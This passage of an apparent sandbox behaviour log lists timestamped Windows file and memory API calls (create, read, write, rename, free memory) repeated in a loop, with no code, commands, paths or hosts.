"2016-02-16 17:41:48,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,562", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,652", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,792", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,842", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,852", "api": 